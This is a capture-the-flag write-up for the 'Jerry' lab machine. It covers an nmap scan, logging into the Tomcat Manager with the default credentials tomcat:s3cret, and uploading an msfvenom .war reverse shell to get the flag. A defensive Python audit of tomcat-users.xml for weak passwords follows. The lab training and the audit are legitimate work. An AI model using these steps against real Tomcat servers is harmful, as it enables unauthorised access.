Jerry (Easy)

Enumeration

Nmap

# Nmap 7.92 scan initiated Tue Jun  7 11:38:57 2022 as: nmap -sC -sV -oA nmap/Jerry -Pn 10.129.88.89
Nmap scan report for 10.129.88.89
Host is up (0.33s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun  7 11:40:24 2022 -- 1 IP address (1 host up) scanned in 87.02 seconds

Navigate to port 8080

Navigate to /manager

Log in with the default credentials tomcat:s3cret

We can use msfvenom to generate a Java .war reverse shell and upload it to Tomcat through the Manager application.

New application inserted!

We can navigate to the Administrator's Desktop to get the flag

Congratz!
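
The foothold above works only because the Manager application accepted tomcat:s3cret. As an added example (not part of the original walkthrough), the following audit parses a tomcat-users.xml file and reports accounts that hold manager or admin roles with a default or trivially guessable password. The sample file, the function names and every entry in KNOWN_DEFAULTS other than s3cret are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Role prefixes that grant access to the Manager / Host Manager applications.
PRIVILEGED_PREFIXES = ("manager", "admin")
# "s3cret" is the password from this walkthrough; the other entries are an
# assumed starting list that should be extended for a real audit.
KNOWN_DEFAULTS = {"s3cret", "tomcat", "password"}

# Constructed sample input, not taken from the target host.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="reports"/>
  <user username="ops" password="Xq7!fR2#vLp9wZ" roles="admin-gui"/>
</tomcat-users>"""


def local(tag):
    """Strip an XML namespace so files with and without xmlns both parse."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, privileged_roles, reason) for each risky account."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local(elem.tag) != "user":
            continue
        # Older files use name=, newer ones username=.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = [r.strip() for r in elem.get("roles", "").split(",") if r.strip()]
        privileged = [r for r in roles if r.startswith(PRIVILEGED_PREFIXES)]
        if not privileged:
            continue  # a weak password without manager access is out of scope here
        if password in KNOWN_DEFAULTS:
            reason = "known default password"
        elif password == "" or password.lower() == name.lower():
            reason = "empty or same as username"
        else:
            continue
        findings.append((name, privileged, reason))
    return findings


if __name__ == "__main__":
    for name, roles, reason in audit_tomcat_users(SAMPLE):
        print(f"[!] {name}: {reason}; roles={','.join(roles)}")
```

Any account it reports should have its password rotated or its manager role removed before port 8080 is reachable from untrusted networks.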
